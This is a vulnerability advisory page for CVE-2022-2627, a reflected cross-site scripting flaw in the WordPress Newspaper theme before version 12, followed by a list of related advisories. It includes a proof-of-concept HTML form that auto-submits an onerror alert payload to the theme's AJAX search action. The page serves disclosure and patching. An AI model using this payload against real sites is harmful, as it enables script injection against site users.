Newspaper < 12 – Reflected Cross-Site Scripting | CVE 2022-2627 | Theme Vulnerabilities

Description

The theme does not sanitise a parameter before outputting it back in an HTML attribute via an AJAX action, leading to a Reflected Cross-Site Scripting.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="td_ajax_search" />
      <input type="hidden" name="td_string" value="<img src=a onerror=alert(/XSS/)>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Themes

Fixed in 12

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ramon Dunker

Submitter

Ramon Dunker

Submitter website

https://ramondunker.nl

Submitter twitter

Verified

Yes

WPVDB ID

038327d0-568f-4011-9b7e-3da39e8b6aea

Timeline

Publicly Published

2022-10-10 (about 3 years ago)

Added

2022-10-10 (about 3 years ago)

Last Updated

2022-10-10 (about 3 years ago)

Other

Published

Title

Published

2025-04-02

Title

Contact Form vCard Generator <= 2.4 - Unauthenticated Stored Cross-Site Scripting

Published

2021-08-06

Title

WP Fusion Lite < 3.37.30 - Reflected Cross-Site Scripting (XSS)

Published

2015-07-29

Title

qTranslate <= 2.5.39 - Cross-Site Scripting (XSS)

Published

2023-05-11

Title

Slimstat Analytics < 5.0.5 - Reflected XSS

Published

2020-10-28

Title

Greenmart < 2.4.3 - Reflected Cross-Site Scripting (XSS)